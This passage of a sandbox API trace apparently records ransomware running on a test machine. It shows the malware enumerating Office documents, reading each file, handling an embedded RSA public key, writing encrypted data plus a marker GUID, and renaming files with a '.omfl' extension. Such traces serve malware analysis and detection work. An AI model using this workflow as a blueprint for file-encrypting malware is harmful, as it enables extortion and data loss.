hHeap=0x4970000) returned 1 [0131.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0131.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.023] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.023] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd35410*, nNumberOfBytesToWrite=0x12e70, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd35410*, lpNumberOfBytesWritten=0xe00fb14*=0x12e70, lpOverlapped=0x0) returned 1 [0131.024] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd35410 | out: hHeap=0x4970000) returned 1 [0131.024] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x12e75, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.024] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.024] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0131.024] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0131.024] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0x757b558 [0131.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x757b558, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0131.024] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdd19550 [0131.024] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b558 | out: hHeap=0x4970000) returned 1 [0131.024] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5f60 | out: hHeap=0x4970000) returned 1 [0131.024] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd19550*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd19550*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0131.025] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0131.025] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.025] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.025] CloseHandle (hObject=0x5c8) returned 1 [0131.027] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0131.027] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0xdd29950 [0131.027] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3088 | out: hHeap=0x4970000) returned 1 [0131.027] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PMgb9ZlI2eeQA.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pmgb9zli2eeqa.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PMgb9ZlI2eeQA.docx.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pmgb9zli2eeqa.docx.omfl")) returned 1 [0131.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0131.028] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.029] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.030] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0131.030] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea2bbeb0, ftCreationTime.dwHighDateTime=0x1d59e2d, ftLastAccessTime.dwLowDateTime=0x6cb8be0, ftLastAccessTime.dwHighDateTime=0x1d5c29b, ftLastWriteTime.dwLowDateTime=0x6cb8be0, ftLastWriteTime.dwHighDateTime=0x1d5c29b, nFileSizeHigh=0x0, nFileSizeLow=0xfab2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qdP8.docx", cAlternateFileName="QDP8~1.DOC")) returned 1 [0131.030] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0131.030] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8e) returned 0xdd14728 [0131.031] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5f60 | out: hHeap=0x4970000) returned 1 [0131.031] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qdP8.docx") returned=".docx" [0131.031] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qdP8.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qdp8.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0131.031] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=64178) returned 1 [0131.031] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.034] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xfa8c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.034] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.035] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.035] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.035] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.035] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0xfab2, lpOverlapped=0x0) returned 1 [0131.036] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.036] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.036] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.036] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.036] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0131.037] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.037] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.037] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.037] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.037] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.037] GetLastError () returned 0x0 [0131.038] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0131.038] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0131.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.038] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.038] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.038] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.038] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.038] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.038] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xfab0) returned 0xdd35410 [0131.038] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0131.038] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.038] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0131.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0131.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0131.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd34788 [0131.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16e78 [0131.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd347d0 [0131.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16e90 [0131.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16ec0 [0131.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0131.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16ed8 [0131.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0131.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0131.039] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0131.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ec0 | out: hHeap=0x4970000) returned 1 [0131.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ed8 | out: hHeap=0x4970000) returned 1 [0131.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0131.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0131.039] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0131.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0131.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16ed8 [0131.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0131.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16ec0 [0131.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0131.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0131.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0131.039] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0131.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0131.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0131.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdb88 [0131.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ed8 | out: hHeap=0x4970000) returned 1 [0131.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ec0 | out: hHeap=0x4970000) returned 1 [0131.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0131.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0131.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0131.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0131.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0131.040] GetCurrentThreadId () returned 0x618 [0131.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0131.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0xdd2ca00 [0131.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0131.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0131.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0131.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0131.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0131.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24788 [0131.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.040] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.040] GetCurrentThreadId () returned 0x618 [0131.040] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0131.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0131.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757ca08 [0131.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0131.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0131.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0131.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0131.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0131.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0131.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0131.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0131.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0131.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16ec0 [0131.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0131.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa860 [0131.041] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0131.041] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0131.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0131.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16ed8 [0131.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0131.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0131.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0131.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16ea8 [0131.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa900 | out: hHeap=0x4970000) returned 1 [0131.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16848 [0131.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0131.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0131.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0131.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0131.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0131.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16ef0 [0131.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0131.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16968 [0131.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0131.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8e0 [0131.042] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.042] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0131.043] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xfab2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.043] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.043] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.043] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.044] CloseHandle (hObject=0x5c8) returned 1 [0131.046] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0131.046] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x870) returned 0xdd29950 [0131.046] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qdP8.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qdp8.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qdP8.docx.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qdp8.docx.omfl")) returned 1 [0131.048] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd35bfd60, ftCreationTime.dwHighDateTime=0x1d563fb, ftLastAccessTime.dwLowDateTime=0x41ae45e0, ftLastAccessTime.dwHighDateTime=0x1d5a130, ftLastWriteTime.dwLowDateTime=0x41ae45e0, ftLastWriteTime.dwHighDateTime=0x1d5a130, nFileSizeHigh=0x0, nFileSizeLow=0x18343, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rff9QSHCPUIE.pptx", cAlternateFileName="RFF9QS~1.PPT")) returned 1 [0131.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0131.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8e) returned 0xdd14728 [0131.048] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rff9QSHCPUIE.pptx") returned=".pptx" [0131.049] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rff9QSHCPUIE.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rff9qshcpuie.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0131.049] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=99139) returned 1 [0131.049] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.052] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x1831d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.052] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.053] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.053] 